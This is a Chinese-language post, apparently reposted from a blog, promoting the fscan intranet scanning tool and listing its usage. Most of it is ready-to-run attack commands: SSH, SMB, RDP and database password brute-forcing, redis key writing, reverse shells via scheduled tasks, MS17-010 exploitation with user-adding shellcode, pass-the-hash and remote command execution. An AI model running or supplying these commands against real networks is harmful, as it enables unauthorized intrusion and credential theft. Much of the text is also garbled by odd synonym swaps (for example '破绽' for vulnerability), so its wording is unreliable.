今天给各人分享一个开源的内网扫描东西,在GitHub平台上面有5.3K Star。详细情况如下:
简介fscan是一款 go语言编写的内网综合扫描东西,便利「一键主动化、全方位漏扫扫描」。能够让你快速的扫描出内网收集的拓扑构造撑持主机存活探测、端口扫描、常见办事的爆破、ms17010、redis 批量写公钥、方案使命反弹 shell、读取 win 网卡信息、web 指纹识别、web 破绽扫描、netbios 探测、域控识别等功用。
次要功用1.信息搜集:
存活探测(icmp)端口扫描2.爆破功用:各类办事爆破(ssh、smb、rdp 等)数据库密码爆破(mysql、mssql、redis、psql、oracle 等)3.系统信息、破绽扫描:netbios 探测、域控识别获取目的网卡信息高危破绽扫描(ms17010 等)4.Web 探测功用:webtitle 探测web 指纹识别(常见 cms、oa 框架等)web 破绽扫描(weblogic、st2 等,撑持 xray 的 poc)5.破绽操纵:redis 写公钥或写方案使命ssh 号令施行ms17017 操纵(植入 shellcode),如添加用户等6.其他功用:文件保留简单用法fscan.exe -h 192.168.1.1/24 (全功用、ms17010、读取网卡信息)fscan.exe -h 192.168.1.1/16 (B段扫描)其他用法fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保留文件、跳过web poc扫描)fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 方案使命反弹shell)fscan.exe -h 192.168.1.1/24 -c "whoami;id" (ssh 爆破胜利后,号令施行)fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来停止爆破)fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描成果保留途径,默认保留在当前途径)fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,便利快速查看网段信息 )fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰碰)fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)fscan.exe -hf ip.txt (以文件导入)fscan.exe -h 192.168.x.x -p80 -PRoxy http://127.0.0.1:8080 一键撑持xray的pocfscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代办署理 http://127.0.0.1:8080)fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不停止爆破,不扫Web poc,以削减流量)fscan.exe -h 192.168.1.1/24 -pa 3389 (在原根底上,参加3389->rdp扫描)fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只撑持简单tcp功用的代办署理,部门功用的库不撑持设置代办署理)fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功用,只适用于备选东西,更保举其他ms17010的专项操纵东西)fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰碰,xxxx:ntlmhash,如32ed87bdb5fDC5e9cba88547376818d4)fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显号令施行)fscan.exe -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完好的netbios信息)fscan.exe -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)编译号令go build -ldflags="-s -w " -trimpath main.goupx -9 fscan.exe (可选,压缩体积) #upx用于二进造文件大小瘦身用的完好参数参考 -c string ssh号令施行 -cookie string 设置cookie -debug int 多久没响应,就打印当前进度(default 60) -domain string smb爆破模块时,设置域名 -h string 目的ip: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12 -hf string 读取文件中的目的 -hn string 扫描时,要跳过的ip: -hn 192.168.1.1/24 -m string 设置扫描形式: -m ssh (default "all") -no 扫描成果不保留到文件中 -nobr 跳过sql、ftp、ssh等的密码爆破 ["平安"] -nopoc 跳过web poc扫描 -np 跳过存活探测 -num int web poc 发包速度 (default 20) -o string 扫描成果保留到哪 (default "result.txt") -p string 设置扫描的端口: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017") -pa string 新增需要扫描的端口,-pa 3389 (会在原有端口列表根底上,新增该端口) -path string fcgi、smb romote file path -ping 利用ping取代icmp停止存活探测 -pn string 扫描时要跳过的端口,as: -pn 445 -pocname string 指定web poc的模糊名字, -pocname weblogic -proxy string 设置代办署理, -proxy http://127.0.0.1:8080 -user string 指定爆破时的用户名 -userf string 指定爆破时的用户名文件 -pwd string 指定爆破时的密码 -pwdf string 指定爆破时的密码文件 -rf string 指定redis写公钥用模块的文件 (as: -rf id_rsa.pub) -rs string redis方案使命反弹shell的ip端口 (as: -rs 192.168.1.1:6666) -silent 寂静扫描,合适cs扫描时不回显 -sshkey string ssh毗连时,指定ssh私钥 -t int 扫描线程 (default 600) -time int 端口扫描超不时间 (default 3) -u string 指定Url扫描 -uf string 指定Url文件扫描 -wt int web拜候超不时间 (default 5) -pocpath string 指定poc途径 -usera string 在原有用户字典根底上,新增新用户 -pwda string 在原有密码字典根底上,增加新密码 -socks5 指定socks5代办署理 (as: -socks5 socks5://127.0.0.1:1080) -sc 指定ms17010操纵模块shellcode,内置添加用户等功用 (as: -sc add) ["平安"]部门利用截图fscan.exe -h 192.168.x.x (全功用、ms17010、读取网卡信息)fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 号令)
fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键撑持xray的poc
fscan.exe -h 192.168.x.x -p 139 (netbios探测、域控识别,下图的[+]DC代表域控)
材料参考:https://github.com/shadow1ng/fscan
来源:云原生生态圈
发表评论